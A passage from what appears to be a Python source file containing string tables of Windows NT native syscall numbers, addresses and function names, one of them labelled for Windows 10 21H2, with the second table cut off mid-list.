00007FFBF39E62F0\tNtNotifyChangeMultipleKeys\r\n0x121\t 00007FFBF39E6310\tNtNotifyChangeSession\r\n0x58\t 00007FFBF39E4A00\tNtOpenDirectoryObject\r\n0x122\t 00007FFBF39E6330\tNtOpenEnlistment\r\n0x40\t 00007FFBF39E4700\tNtOpenEvent\r\n0x123\t 00007FFBF39E6350\tNtOpenEventPair\r\n0x33\t 00007FFBF39E4560\tNtOpenFile\r\n0x124\t 00007FFBF39E6370\tNtOpenIoCompletion\r\n0x125\t 00007FFBF39E6390\tNtOpenJobObject\r\n0x12\t 00007FFBF39E4140\tNtOpenKey\r\n0x126\t 00007FFBF39E63B0\tNtOpenKeyEx\r\n0x127\t 00007FFBF39E63D0\tNtOpenKeyTransacted\r\n0x128\t 00007FFBF39E63F0\tNtOpenKeyTransactedEx\r\n0x129\t 00007FFBF39E6410\tNtOpenKeyedEvent\r\n0x12A\t 00007FFBF39E6430\tNtOpenMutant\r\n0x12B\t 00007FFBF39E6450\tNtOpenObjectAuditAlarm\r\n0x12C\t 00007FFBF39E6470\tNtOpenPartition\r\n0x12D\t 00007FFBF39E6490\tNtOpenPrivateNamespace\r\n0x26\t 00007FFBF39E43C0\tNtOpenProcess\r\n0x12E\t 00007FFBF39E64B0\tNtOpenProcessToken\r\n0x30\t 00007FFBF39E4500\tNtOpenProcessTokenEx\r\n0x12F\t 00007FFBF39E64D0\tNtOpenRegistryTransaction\r\n0x130\t 00007FFBF39E64F0\tNtOpenResourceManager\r\n0x37\t 00007FFBF39E45E0\tNtOpenSection\r\n0x131\t 00007FFBF39E6510\tNtOpenSemaphore\r\n0x132\t 00007FFBF39E6530\tNtOpenSession\r\n0x133\t 00007FFBF39E6550\tNtOpenSymbolicLinkObject\r\n0x134\t 00007FFBF39E6570\tNtOpenThread\r\n0x24\t 00007FFBF39E4380\tNtOpenThreadToken\r\n0x2F\t 00007FFBF39E44E0\tNtOpenThreadTokenEx\r\n0x135\t 00007FFBF39E6590\tNtOpenTimer\r\n0x136\t 00007FFBF39E65B0\tNtOpenTransaction\r\n0x137\t 00007FFBF39E65D0\tNtOpenTransactionManager\r\n0x138\t 00007FFBF39E65F0\tNtPlugPlayControl\r\n0x5F\t 00007FFBF39E4AD0\tNtPowerInformation\r\n0x139\t 00007FFBF39E6610\tNtPrePrepareComplete\r\n0x13A\t 00007FFBF39E6630\tNtPrePrepareEnlistment\r\n0x13B\t 00007FFBF39E6650\tNtPrepareComplete\r\n0x13C\t 00007FFBF39E6670\tNtPrepareEnlistment\r\n0x0C013D\t 00007FFBF39E6690\tNtPrivilegeCheck\r\n0x13E\t 00007FFBF39E66B0\tNtPrivilegeObjectAuditAlarm\r\n0x13F\t 00007FFBF39E66D0\tNtPrivilegedServiceAuditAlarm\r\n0x140\t 00007FFBF39E66F0\tNtPropagationComplete\r\n0x141\t 00007FFBF39E6710\tNtPropagationFailed\r\n0x50\t 00007FFBF39E4900\tNtProtectVirtualMemory\r\n0x142\t 00007FFBF39E6730\tNtPssCaptureVaSpaceBulk\r\n0x70143\t 00007FFBF39E6750\tNtPulseEvent\r\n0x3D\t 00007FFBF39E46A0\tNtQueryAttributesFile\r\n0x144\t 00007FFBF39E6770\tNtQueryAuxiliaryCounterFrequency\r\n0x145\t 00007FFBF39E6790\tNtQueryBootEntryOrder\r\n0x146\t 00007FFBF39E67B0\tNtQueryBootOptions\r\n0x50147\t 00007FFBF39E67D0\tNtQueryDebugFilterState\r\n0x50015\t 00007FFBF39E41A0\tNtQueryDefaultLocale\r\n0x40044\t 00007FFBF39E4780\tNtQueryDefaultUILanguage\r\n0x35\t 00007FFBF39E45A0\tNtQueryDirectoryFile\r\n0x148\t 00007FFBF39E67F0\tNtQueryDirectoryFileEx\r\n0x149\t 00007FFBF39E6810\tNtQueryDirectoryObject\r\n0x14A\t 00007FFBF39E6830\tNtQueryDriverEntryOrder\r\n0x14B\t 00007FFBF39E6850\tNtQueryEaFile\r\n0x56\t 00007FFBF39E49C0\tNtQueryEvent\r\n0x14C\t 00007FFBF39E6870\tNtQueryFullAttributesFile\r\n0x14D\t 00007FFBF39E6890\tNtQueryInformationAtom\r\n0x14E\t 00007FFBF39E68B0\tNtQueryInformationByName\r\n0x14F\t 00007FFBF39E68D0\tNtQueryInformationEnlistment\r\n0x11\t 00007FFBF39E4120\tNtQueryInformationFile\r\n0x150\t 00007FFBF39E68F0\tNtQueryInformationJobObject\r\n0x151\t 00007FFBF39E6910\tNtQueryInformationPort\r\n0x19\t 00007FFBF39E4220\tNtQueryInformationProcess\r\n0x152\t 00007FFBF39E6930\tNtQueryInformationResourceManager\r\n0x25\t 00007FFBF39E43A0\tNtQueryInformationThread\r\n0x21\t 00007FFBF39E4320\tNtQueryInformationToken\r\n0x153\t 00007FFBF39E6950\tNtQueryInformationTransaction\r\n0x154\t 00007FFBF39E6970\tNtQueryInformationTransactionManager\r\n0x155\t 00007FFBF39E6990\tNtQueryInformationWorkerFactory\r\n0x40156\t 00007FFBF39E69B0\tNtQueryInstallUILanguage\r\n0x50157\t 00007FFBF39E69D0\tNtQueryIntervalProfile\r\n0x158\t 00007FFBF39E69F0\tNtQueryIoCompletion\r\n0x159\t 00007FFBF39E6A10\tNtQueryIoRingCapabilities\r\n0x16\t 00007FFBF39E41C0\tNtQueryKey\r\n0x15A\t 00007FFBF39E6A30\tNtQueryLicenseValue\r\n0x15B\t 00007FFBF39E6A50\tNtQueryMultipleValueKey\r\n0x15C\t 00007FFBF39E6A70\tNtQueryMutant\r\n0x10\t 00007FFBF39E4100\tNtQueryObject\r\n0x15D\t 00007FFBF39E6A90\tNtQueryOpenSubKeys\r\n0x15E\t 00007FFBF39E6AB0\tNtQueryOpenSubKeysEx\r\n0x50031\t 00007FFBF39E4520\tNtQueryPerformanceCounter\r\n0x1015F\t 00007FFBF39E6AD0\tNtQueryPortInformationProcess\r\n0x160\t 00007FFBF39E6AF0\tNtQueryQuotaInformationFile\r\n0x51\t 00007FFBF39E4920\tNtQuerySection\r\n0x161\t 00007FFBF39E6B10\tNtQuerySecurityAttributesToken\r\n0x162\t 00007FFBF39E6B30\tNtQuerySecurityObject\r\n0x163\t 00007FFBF39E6B50\tNtQuerySecurityPolicy\r\n0x164\t 00007FFBF39E6B70\tNtQuerySemaphore\r\n0x165\t 00007FFBF39E6B90\tNtQuerySymbolicLinkObject\r\n0x166\t 00007FFBF39E6BB0\tNtQuerySystemEnvironmentValue\r\n0x167\t 00007FFBF39E6BD0\tNtQuerySystemEnvironmentValueEx\r\n0x36\t 00007FFBF39E45C0\tNtQuerySystemInformation\r\n0x168\t 00007FFBF39E6BF0\tNtQuerySystemInformationEx\r\n0x38\t 00007FFBF39E4600\tNtQueryTimer\r\n0x0A0169\t 00007FFBF39E6C10\tNtQueryTimerResolution\r\n0x17\t 00007FFBF39E41E0\tNtQueryValueKey\r\n0x23\t 00007FFBF39E4360\tNtQueryVirtualMemory\r\n0x49\t 00007FFBF39E4820\tNtQueryVolumeInformationFile\r\n0x16A\t 00007FFBF39E6C30\tNtQueryWnfStateData\r\n0x16B\t 00007FFBF39E6C50\tNtQueryWnfStateNameInformation\r\n0x45\t 00007FFBF39E47A0\tNtQueueApcThread\r\n0x16C\t 00007FFBF39E6C70\tNtQueueApcThreadEx\r\n0x16D\t 00007FFBF39E6C90\tNtQueueApcThreadEx2\r\n0x16E\t 00007FFBF39E6CB0\tNtRaiseException\r\n0x16F\t 00007FFBF39E6CD0\tNtRaiseHardError\r\n0x1A0006\t 00007FFBF39E3FC0\tNtReadFile\r\n0x1A002E\t 00007FFBF39E44C0\tNtReadFileScatter\r\n0x170\t 00007FFBF39E6CF0\tNtReadOnlyEnlistment\r\n0x54\t 00007FFBF39E4980\tNtReadRequestData\r\n0x3F\t 00007FFBF39E46E0\tNtReadVirtualMemory\r\n0x171\t 00007FFBF39E6D10\tNtReadVirtualMemoryEx\r\n0x172\t 00007FFBF39E6D30\tNtRecoverEnlistment\r\n0x173\t 00007FFBF39E6D50\tNtRecoverResourceManager\r\n0x174\t 00007FFBF39E6D70\tNtRecoverTransactionManager\r\n0x175\t 00007FFBF39E6D90\tNtRegisterProtocolAddressInformation\r\n0x30176\t 00007FFBF39E6DB0\tNtRegisterThreadTerminatePort\r\n0x140177 00007FFBF39E6DD0\tNtReleaseKeyedEvent\r\n0x70020\t 00007FFBF39E4300\tNtReleaseMutant\r\n0x0C000A\t 00007FFBF39E4040\tNtReleaseSemaphore\r\n0x30178\t 00007FFBF39E6DF0\tNtReleaseWorkerFactoryWorker\r\n0x1C0009\t 00007FFBF39E4020\tNtRemoveIoCompletion\r\n0x179\t 00007FFBF39E6E10\tNtRemoveIoCompletionEx\r\n0x8017A\t 00007FFBF39E6E30\tNtRemoveProcessDebug\r\n0x17B\t 00007FFBF39E6E50\tNtRenameKey\r\n0x17C\t 00007FFBF39E6E70\tNtRenameTransactionManager\r\n0x17D\t 00007FFBF39E6E90\tNtReplaceKey\r\n0x17E\t 00007FFBF39E6EB0\tNtReplacePartitionUnit\r\n0x0C\t 00007FFBF39E4080\tNtReplyPort\r\n0x0B\t 00007FFBF39E4060\tNtReplyWaitReceivePort\r\n0x2B\t 00007FFBF39E4460\tNtReplyWaitReceivePortEx\r\n0x17F\t 00007FFBF39E6ED0\tNtReplyWaitReplyPort\r\n0x180\t 00007FFBF39E6EF0\tNtRequestPort\r\n0x22\t 00007FFBF39E4340\tNtRequestWaitReplyPort\r\n0x70181\t 00007FFBF39E6F10\tNtResetEvent\r\n0x0C0182\t 00007FFBF39E6F30\tNtResetWriteWatch\r\n0x183\t 00007FFBF39E6F50\tNtRestoreKey\r\n0x30184\t 00007FFBF39E6F70\tNtResumeProcess\r\n0x70052\t 00007FFBF39E4940\tNtResumeThread\r\n0x185\t 00007FFBF39E6F90\tNtRevertContainerImpersonation\r\n0x186\t 00007FFBF39E6FB0\tNtRollbackComplete\r\n0x187\t 00007FFBF39E6FD0\tNtRollbackEnlistment\r\n0x188\t 00007FFBF39E6FF0\tNtRollbackRegistryTransaction\r\n0x189\t 00007FFBF39E7010\tNtRollbackTransaction\r\n0x18A\t 00007FFBF39E7030\tNtRollforwardTransactionManager\r\n0x8018B\t 00007FFBF39E7050\tNtSaveKey\r\n0x0E018C\t 00007FFBF39E7070\tNtSaveKeyEx\r\n0x0B018D\t 00007FFBF39E7090\tNtSaveMergedKeys\r\n0x18E\t 00007FFBF39E70B0\tNtSecureConnectPort\r\n0x18F\t 00007FFBF39E70D0\tNtSerializeBoot\r\n0x190\t 00007FFBF39E70F0\tNtSetBootEntryOrder\r\n0x191\t 00007FFBF39E7110\tNtSetBootOptions\r\n0x192\t 00007FFBF39E7130\tNtSetCachedSigningLevel\r\n0x193\t 00007FFBF39E7150\tNtSetCachedSigningLevel2\r\n0x194\t 00007FFBF39E7170\tNtSetContextThread\r\n0x0A0195\t 00007FFBF39E7190\tNtSetDebugFilterState\r\n0x30196\t 00007FFBF39E71B0\tNtSetDefaultHardErrorPort\r\n0x50197\t 00007FFBF39E71D0\tNtSetDefaultLocale\r\n0x40198\t 00007FFBF39E71F0\tNtSetDefaultUILanguage\r\n0x199\t 00007FFBF39E7210\tNtSetDriverEntryOrder\r\n0x19A\t 00007FFBF39E7230\tNtSetEaFile\r\n0x7000E\t 00007FFBF39E40C0\tNtSetEvent\r\n0x3002D\t 00007FFBF39E44A0\tNtSetEventBoostPriority\r\n0x3019B\t 00007FFBF39E7250\tNtSetHighEventPair\r\n0x3019C\t 00007FFBF39E7270\tNtSetHighWaitLowEventPair\r\n0x7019D\t 00007FFBF39E7290\tNtSetIRTimer\r\n0x19E\t 00007FFBF39E72B0\tNtSetInformationDebugObject\r\n0x19F\t 00007FFBF39E72D0\tNtSetInformationEnlistment\r\n0x27\t 00007FFBF39E43E0\tNtSetInformationFile\r\n0x1A0\t 00007FFBF39E72F0\tNtSetInformationIoRing\r\n0x1A1\t 00007FFBF39E7310\tNtSetInformationJobObject\r\n0x1A2\t 00007FFBF39E7330\tNtSetInformationKey\r\n0x5C\t 00007FFBF39E4A70\tNtSetInformationObject\r\n0x1C\t 00007FFBF39E4280\tNtSetInformationProcess\r\n0x1A3\t 00007FFBF39E7350\tNtSetInformationResourceManager\r\n0x1A4\t 00007FFBF39E7370\tNtSetInformationSymbolicLink\r\n0x0D\t 00007FFBF39E40A0\tNtSetInformationThread\r\n0x1A5\t 00007FFBF39E7390\tNtSetInformationToken\r\n0x1A6\t 00007FFBF39E73B0\tNtSetInformationTransaction\r\n0x1A7\t 00007FFBF39E73D0\tNtSetInformationTransactionManager\r\n0x1A8\t 00007FFBF39E73F0\tNtSetInformationVirtualMemory\r\n0x1A9\t 00007FFBF39E7410\tNtSetInformationWorkerFactory\r\n0x501AA\t 00007FFBF39E7430\tNtSetIntervalProfile\r\n0x1AB\t 00007FFBF39E7450\tNtSetIoCompletion\r\n0x1AC\t 00007FFBF39E7470\tNtSetIoCompletionEx\r\n0x1AD\t 00007FFBF39E7490\tNtSetLdtEntries\r\n0x301AE\t 00007FFBF39E74B0\tNtSetLowEventPair\r\n0x301AF\t 00007FFBF39E74D0\tNtSetLowWaitHighEventPair\r\n0x1B0\t 00007FFBF39E74F0\tNtSetQuotaInformationFile\r\n0x1B1\t 00007FFBF39E7510\tNtSetSecurityObject\r\n0x1B2\t 00007FFBF39E7530\tNtSetSystemEnvironmentValue\r\n0x1B3\t 00007FFBF39E7550\tNtSetSystemEnvironmentValueEx\r\n0x1B4\t 00007FFBF39E7570\tNtSetSystemInformation\r\n0x1B5\t 00007FFBF39E7590\tNtSetSystemPowerState\r\n0x501B6\t 00007FFBF39E75B0\tNtSetSystemTime\r\n0x501B7\t 00007FFBF39E75D0\tNtSetThreadExecutionState\r\n0x62\t 00007FFBF39E4B30\tNtSetTimer\r\n0x1B8\t 00007FFBF39E75F0\tNtSetTimer2\r\n0x1B9\t 00007FFBF39E7610\tNtSetTimerEx\r\n0x0A01BA\t 00007FFBF39E7630\tNtSetTimerResolution\r\n0x401BB\t 00007FFBF39E7650\tNtSetUuidSeed\r\n0x60\t 00007FFBF39E4AF0\tNtSetValueKey\r\n0x1BC\t 00007FFBF39E7670\tNtSetVolumeInformationFile\r\n0x1BD\t 00007FFBF39E7690\tNtSetWnfProcessNotificationEvent\r\n0x401BE\t 00007FFBF39E76B0\tNtShutdownSystem\r\n0x1BF\t 00007FFBF39E76D0\tNtShutdownWorkerFactory\r\n0x1301C0\t 00007FFBF39E76F0\tNtSignalAndWaitForSingleObject\r\n0x1C1\t 00007FFBF39E7710\tNtSinglePhaseReject\r\n0x301C2\t 00007FFBF39E7730\tNtStartProfile\r\n0x301C3\t 00007FFBF39E7750\tNtStopProfile\r\n0x1C4\t 00007FFBF39E7770\tNtSubmitIoRing\r\n0x1C5\t 00007FFBF39E7790\tNtSubscribeWnfStateChange\r\n0x301C6\t 00007FFBF39E77B0\tNtSuspendProcess\r\n0x701C7\t 00007FFBF39E77D0\tNtSuspendThread\r\n0x1C8\t 00007FFBF39E77F0\tNtSystemDebugControl\r\n0x1C9\t 00007FFBF39E7810\tNtTerminateEnclave\r\n0x701CA\t 00007FFBF39E7830\tNtTerminateJobObject\r\n0x7002C\t 00007FFBF39E4480\tNtTerminateProcess\r\n0x70053\t 00007FFBF39E4960\tNtTerminateThread\r\n0x201CB\t 00007FFBF39E7850\tNtTestAlert\r\n0x1CC\t 00007FFBF39E7870\tNtThawRegistry\r\n0x1CD\t 00007FFBF39E7890\tNtThawTransactions\r\n0x1CE\t 00007FFBF39E78B0\tNtTraceControl\r\n0x5E\t 00007FFBF39E4AB0\tNtTraceEvent\r\n0x1101CF\t 00007FFBF39E78D0\tNtTranslateFilePath\r\n0x1D0\t 00007FFBF39E78F0\tNtUmsThreadYield\r\n0x1D1\t 00007FFBF39E7910\tNtUnloadDriver\r\n0x1D2\t 00007FFBF39E7930\tNtUnloadKey\r\n0x1D3\t 00007FFBF39E7950\tNtUnloadKey2\r\n0x1D4\t 00007FFBF39E7970\tNtUnloadKeyEx\r\n0x1D5\t 00007FFBF39E7990\tNtUnlockFile\r\n0x1D6\t 00007FFBF39E79B0\tNtUnlockVirtualMemory\r\n0x2A\t 00007FFBF39E4440\tNtUnmapViewOfSection\r\n0x1D7\t 00007FFBF39E79D0\tNtUnmapViewOfSectionEx\r\n0x1D8\t 00007FFBF39E79F0\tNtUnsubscribeWnfStateChange\r\n0x1D9\t 00007FFBF39E7A10\tNtUpdateWnfStateData\r\n0x1DA\t 00007FFBF39E7A30\tNtVdmControl\r\n0x601DB\t 00007FFBF39E7A50\tNtWaitForAlertByThreadId\r\n0x1DC\t 00007FFBF39E7A70\tNtWaitForDebugEvent\r\n0x1501DD\t 00007FFBF39E7A90\tNtWaitForKeyedEvent\r\n0x1D005B\t 00007FFBF39E4A50\tNtWaitForMultipleObjects\r\n0x1E001A\t 00007FFBF39E4240\tNtWaitForMultipleObjects32\r\n0x0D0004\t 00007FFBF39E3F80\tNtWaitForSingleObject\r\n0x1DE\t 00007FFBF39E7AB0\tNtWaitForWorkViaWorkerFactory\r\n0x301DF\t 00007FFBF39E7AD0\tNtWaitHighEventPair\r\n0x301E0\t 00007FFBF39E7AF0\tNtWaitLowEventPair\r\n0x30001\t 00007FFBF39E3F20\tNtWorkerFactoryWorkerReady\r\n0x1A0008\t 00007FFBF39E4000\tNtWriteFile\r\n0x1A001B\t 00007FFBF39E4260\tNtWriteFileGather\r\n0x57\t 00007FFBF39E49E0\tNtWriteRequestData\r\n0x3A\t 00007FFBF39E4640\tNtWriteVirtualMemory\r\n0x10046\t 00007FFBF39E47C0\tNtYieldExecution\r\n0x1ED\t 00007FFBF39E45C0\tRtlGetNativeSystemInformation\r\n\r\n\"\"\"\r\nt=0\r\n\r\nwin1021h2=\"\"\"SYSCALL ADDRESS FUNCTION\r\n-----------------------------------------\r\n0x02\t 00007FFEFDA0CD70\tNtAcceptConnectPort\r\n0x00\t 00007FFEFDA0CD30\tNtAccessCheck\r\n0x29\t 00007FFEFDA0D250\tNtAccessCheckAndAuditAlarm\r\n0x63\t 00007FFEFDA0D980\tNtAccessCheckByType\r\n0x59\t 00007FFEFDA0D850\tNtAccessCheckByTypeAndAuditAlarm\r\n0x64\t 00007FFEFDA0D9A0\tNtAccessCheckByTypeResultList\r\n0x65\t 00007FFEFDA0D9C0\tNtAccessCheckByTypeResultListAndAuditAlarm\r\n0x66\t 00007FFEFDA0D9E0\tNtAccessCheckByTypeResultListAndAuditAlarmByHandle\r\n0x67\t 00007FFEFDA0DA00\tNtAcquireCrossVmMutant\r\n0x68\t 00007FFEFDA0DA20\tNtAcquireProcessActivityReference\r\n0x0A0047\t 00007FFEFDA0D610\tNtAddAtom\r\n0x110069\t 00007FFEFDA0DA40\tNtAddAtomEx\r\n0x6A\t 00007FFEFDA0DA60\tNtAddBootEntry\r\n0x6B\t 00007FFEFDA0DA80\tNtAddDriverEntry\r\n0x6C\t 00007FFEFDA0DAA0\tNtAdjustGroupsToken\r\n0x41\t 00007FFEFDA0D550\tNtAdjustPrivilegesToken\r\n0x6D\t 00007FFEFDA0DAC0\tNtAdjustTokenClaimsAndDeviceGroups\r\n0x7006E\t 00007FFEFDA0DAE0\tNtAlertResumeThread\r\n0x3006F\t 00007FFEFDA0DB00\tNtAlertThread\r\n0x40070\t 00007FFEFDA0DB20\tNtAlertThreadByThreadId\r\n0x40071\t 00007FFEFDA0DB40\tNtAllocateLocallyUniqueId\r\n0x72\t 00007FFEFDA0DB60\tNtAllocateReserveObject\r\n0x73\t 00007FFEFDA0DB80\tNtAllocateUserPhysicalPages\r\n0x74\t 00007FFEFDA0DBA0\tNtAllocateUserPhysicalPagesEx\r\n0x110075\t 00007FFEFDA0DBC0\tNtAllocateUuids\r\n0x18\t 00007FFEFDA0D030\tNtAllocateVirtualMemory\r\n0x76\t 00007FFEFDA0DBE0\tNtAllocateVirtualMemoryEx\r\n0x77\t 00007FFEFDA0DC00\tNtAlpcAcceptConnectPort\r\n0x78\t 00007FFEFDA0DC20\tNtAlpcCancelMessage\r\n0x79\t 00007FFEFDA0DC40\tNtAlpcConnectPort\r\n0x7A\t 00007FFEFDA0DC60\tNtAlpcConnectPortEx\r\n0x7B\t 00007FFEFDA0DC80\tNtAlpcCreatePort\r\n0x7C\t 00007FFEFDA0DCA0\tNtAlpcCreatePortSection\r\n0x7D\t 00007FFEFDA0DCC0\tNtAlpcCreateResourceReserve\r\n0x7E\t 00007FFEFDA0DCE0\tNtAlpcCreateSectionView\r\n0x7F\t 00007FFEFDA0DD00\tNtAlpcCreateSecurityContext\r\n0x80\t 00007FFEFDA0DD20\tNtAlpcDeletePortSection\r\n0x81\t 00007FFEFDA0DD40\tNtAlpcDeleteResourceReserve\r\n0x82\t 00007FFEFDA0DD60\tNtAlpcDeleteSectionView\r\n0x83\t 00007FFEFDA0DD80\tNtAlpcDeleteSecurityContext\r\n0x84\t 00007FFEFDA0DDA0\tNtAlpcDisconnectPort\r\n0x85\t 00007FFEFDA0DDC0\tNtAlpcImpersonateClientContainerOfPort\r\n0x86\t 00007FFEFDA0DDE0\tNtAlpcImpersonateClientOfPort\r\n0x87\t 00007FFEFDA0DE00\tNtAlpcOpenSenderProcess\r\n0x88\t 00007FFEFDA0DE20\tNtAlpcOpenSenderThread\r\n0x89\t 00007FFEFDA0DE40\tNtAlpcQueryInformation\r\n0x8A\t 00007FFEFDA0DE60\tNtAlpcQueryInformationMessage\r\n0x8B\t 00007FFEFDA0DE80\tNtAlpcRevokeSecurityContext\r\n0x8C\t 00007FFEFDA0DEA0\tNtAlpcSendWaitReceivePort\r\n0x8D\t 00007FFEFDA0DEC0\tNtAlpcSetInformation\r\n0x4C\t 00007FFEFDA0D6B0\tNtApphelpCacheControl\r\n0x5008E\t 00007FFEFDA0DEE0\tNtAreMappedFilesTheSame\r\n0x8008F\t 00007FFEFDA0DF00\tNtAssignProcessToJobObject\r\n0x90\t 00007FFEFDA0DF20\tNtAssociateWaitCompletionPacket\r\n0x91\t 00007FFEFDA0DF40\tNtCallEnclave\r\n0x05\t 00007FFEFDA0CDD0\tNtCallbackReturn\r\n0x5D\t 00007FFEFDA0D8C0\tNtCancelIoFile\r\n0x92\t 00007FFEFDA0DF60\tNtCancelIoFileEx\r\n0x93\t 00007FFEFDA0DF80\tNtCancelSynchronousIoFile\r\n0x61\t 00007FFEFDA0D940\tNtCancelTimer\r\n0x94\t 00007FFEFDA0DFA0\tNtCancelTimer2\r\n0x95\t 00007FFEFDA0DFC0\tNtCancelWaitCompletionPacket\r\n0x3003E\t 00007FFEFDA0D4F0\tNtClearEvent\r\n0x3000F\t 00007FFEFDA0CF10\tNtClose\r\n0x3B\t 00007FFEFDA0D490\tNtCloseObjectAuditAlarm\r\n0x96\t 00007FFEFDA0DFE0\tNtCommitComplete\r\n0x97\t 00007FFEFDA0E000\tNtCommitEnlistment\r\n0x98\t 00007FFEFDA0E020\tNtCommitRegistryTransaction\r\n0x99\t 00007FFEFDA0E040\tNtCommitTransaction\r\n0x9A\t 00007FFEFDA0E060\tNtCompactKeys\r\n0x9B\t 00007FFEFDA0E080\tNtCompareObjects\r\n0x9C\t 00007FFEFDA0E0A0\tNtCompareSigningLevels\r\n0x9D\t 00007FFEFDA0E0C0\tNtCompareTokens\r\n0x9E\t 00007FFEFDA0E0E0\tNtCompleteConnectPort\r\n0x3009F\t 00007FFEFDA0E100\tNtCompressKey\r\n0xA0\t 00007FFEFDA0E120\tNtConnectPort\r\n0x43\t 00007FFEFDA0D590\tNtContinue\r\n0xA1\t 00007FFEFDA0E140\tNtContinueEx\r\n0xA2\t 00007FFEFDA0E160\tNtConvertBetweenAuxiliaryCounterAndPerformanceCounter\r\n0xA3\t 00007FFEFDA0E180\tNtCreateCrossVmEvent\r\n0xA4\t 00007FFEFDA0E1A0\tNtCreateCrossVmMutant\r\n0xA5\t 00007FFEFDA0E1C0\tNtCreateDebugObject\r\n0xA6\t 00007FFEFDA0E1E0\tNtCreateDirectoryObject\r\n0xA7\t 00007FFEFDA0E200\tNtCreateDirectoryObjectEx\r\n0xA8\t 00007FFEFDA0E220\tNtCreateEnclave\r\n0xA9\t 00007FFEFDA0E240\tNtCreateEnlistment\r\n0x48\t 00007FFEFDA0D630\tNtCreateEvent\r\n0xAA\t 00007FFEFDA0E260\tNtCreateEventPair\r\n0x55\t 00007FFEFDA0D7D0\tNtCreateFile\r\n0xAB\t 00007FFEFDA0E280\tNtCreateIRTimer\r\n0xAC\t 00007FFEFDA0E2A0\tNtCreateIoCompletion\r\n0xAD\t 00007FFEFDA0E2C0\tNtCreateJobObject\r\n0xAE\t 00007FFEFDA0E2E0\tNtCreateJobSet\r\n0x1D\t 00007FFEFDA0D0D0\tNtCreateKey\r\n0xAF\t 00007FFEFDA0E300\tNtCreateKeyTransacted\r\n0xB0\t 00007FFEFDA0E320\tNtCreateKeyedEvent\r\n0xB1\t 00007FFEFDA0E340\tNtCreateLowBoxToken\r\n0xB2\t 00007FFEFDA0E360\tNtCreateMailslotFile\r\n0xB3\t 00007FFEFDA0E380\tNtCreateMutant\r\n0xB4\t 00007FFEFDA0E3A0\tNtCreateNamedPipeFile\r\n0xB5\t 00007FFEFDA0E3C0\tNtCreatePagingFile\r\n0xB6\t 00007FFEFDA0E3E0\tNtCreatePartition\r\n0xB7\t 00007FFEFDA0E400\tNtCreatePort\r\n0xB8\t 00007FFEFDA0E420\tNtCreatePrivateNamespace\r\n0xB9\t 00007FFEFDA0E440\tNtCreateProcess\r\n0x4D\t 00007FFEFDA0D6D0\tNtCreateProcessEx\r\n0xBA\t 00007FFEFDA0E460\tNtCreateProfile\r\n0xBB\t 00007FFEFDA0E480\tNtCreateProfileEx\r\n0xBC\t 00007FFEFDA0E4A0\tNtCreateRegistryTransaction\r\n0xBD\t 00007FFEFDA0E4C0\tNtCreateResourceManager\r\n0x4A\t 00007FFEFDA0D670\tNtCreateSection\r\n0xBE\t 00007FFEFDA0E4E0\tNtCreateSectionEx\r\n0xBF\t 00007FFEFDA0E500\tNtCreateSemaphore\r\n0xC0\t 00007FFEFDA0E520\tNtCreateSymbolicLinkObject\r\n0x4E\t 00007FFEFDA0D6F0\tNtCreateThread\r\n0xC1\t 00007FFEFDA0E540\tNtCreateThreadEx\r\n0xC2\t 00007FFEFDA0E560\tNtCreateTimer\r\n0xC3\t 00007FFEFDA0E580\tNtCreateTimer2\r\n0xC4\t 00007FFEFDA0E5A0\tNtCreateToken\r\n0xC5\t 00007FFEFDA0E5C0\tNtCreateTokenEx\r\n0xC6\t 00007FFEFDA0E5E0\tNtCreateTransaction\r\n0xC7\t 00007FFEFDA0E600\tNtCreateTransactionManager\r\n0xC8\t 00007FFEFDA0E620\tNtCreateUserProcess\r\n0xC9\t 00007FFEFDA0E640\tNtCreateWaitCompletionPacket\r\n0xCA\t 00007FFEFDA0E660\tNtCreateWaitablePort\r\n0xCB\t 00007FFEFDA0E680\tNtCreateWnfStateName\r\n0xCC\t 00007FFEFDA0E6A0\tNtCreateWorkerFactory\r\n0x800CD\t 00007FFEFDA0E6C0\tNtDebugActiveProcess\r\n0xCE\t 00007FFEFDA0E6E0\tNtDebugContinue\r\n0x60034\t 00007FFEFDA0D3B0\tNtDelayExecution\r\n0x400CF\t 00007FFEFDA0E700\tNtDeleteAtom\r\n0xD0\t 00007FFEFDA0E720\tNtDeleteBootEntry\r\n0xD1\t 00007FFEFDA0E740\tNtDeleteDriverEntry\r\n0xD2\t 00007FFEFDA0E760\tNtDeleteFile\r\n0xD3\t 00007FFEFDA0E780\tNtDeleteKey\r\n0xD4\t 00007FFEFDA0E7A0\tNtDeleteObjectAuditAlarm\r\n0xD5\t 00007FFEFDA0E7C0\tNtDeletePrivateNamespace\r\n0xD6\t 00007FFEFDA0E7E0\tNtDeleteValueKey\r\n0xD7\t 00007FFEFDA0E800\tNtDeleteWnfStateData\r\n0xD8\t 00007FFEFDA0E820\tNtDeleteWnfStateName\r\n0x1B0007\t 00007FFEFDA0CE10\tNtDeviceIoControlFile\r\n0xD9\t 00007FFEFDA0E840\tNtDirectGraphicsCall\r\n0xDA\t 00007FFEFDA0E860\tNtDisableLastKnownGood\r\n0xDB\t 00007FFEFDA0E880\tNtDisplayString\r\n0xDC\t 00007FFEFDA0E8A0\tNtDrawText\r\n0x3C\t 00007FFEFDA0D4B0\tNtDuplicateObject\r\n0x42\t 00007FFEFDA0D570\tNtDuplicateToken\r\n0xDD\t 00007FFEFDA0E8C0\tNtEnableLastKnownGood\r\n0xDE\t 00007FFEFDA0E8E0\tNtEnumerateBootEntries\r\n0xDF\t 00007FFEFDA0E900\tNtEnumerateDriverEntries\r\n0x32\t 00007FFEFDA0D370\tNtEnumerateKey\r\n0xE0\t 00007FFEFDA0E920\tNtEnumerateSystemEnvironmentValuesEx\r\n0xE1\t 00007FFEFDA0E940\tNtEnumerateTransactionObject\r\n0x13\t 00007FFEFDA0CF90\tNtEnumerateValueKey\r\n0xE2\t 00007FFEFDA0E960\tNtExtendSection\r\n0xE3\t 00007FFEFDA0E980\tNtFilterBootOption\r\n0xE4\t 00007FFEFDA0E9A0\tNtFilterToken\r\n0xE5\t 00007FFEFDA0E9C0\tNtFilterTokenEx\r\n0x0A0014\t 00007FFEFDA0CFB0\tNtFindAtom\r\n0x4B\t 00007FFEFDA0D690\tNtFlushBuffersFile\r\n0xE6\t 00007FFEFDA0E9E0\tNtFlushBuffersFileEx\r\n0xE7\t 00007FFEFDA0EA00\tNtFlushInstallUILanguage\r\n0x0C00E8\t 00007FFEFDA0EA20\tNtFlushInstructionCache\r\n0x300E9\t 00007FFEFDA0EA40\tNtFlushKey\r\n0xEA\t 